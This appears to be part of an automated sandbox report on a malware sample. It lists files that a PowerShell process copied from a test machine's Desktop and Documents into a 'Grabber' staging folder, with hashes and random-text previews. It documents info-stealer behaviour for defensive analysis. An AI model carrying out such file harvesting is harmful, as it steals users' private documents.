Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\QCOILOQIKC.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697125102277996
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                                                      MD5:207485EFCE70435971C31586A1E4CF97
                                                                                      SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                                                      SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                                                      SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):3.514693737970008
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                                      MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                                      SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                                      SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                                      SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\GLTYDMDUST.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69569301223482
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
                                                                                      MD5:CA404BEA65D84F58838AF73B2DC67E02
                                                                                      SHA1:56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
                                                                                      SHA-256:4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
                                                                                      SHA-512:10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\KLIZUSIQEN.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
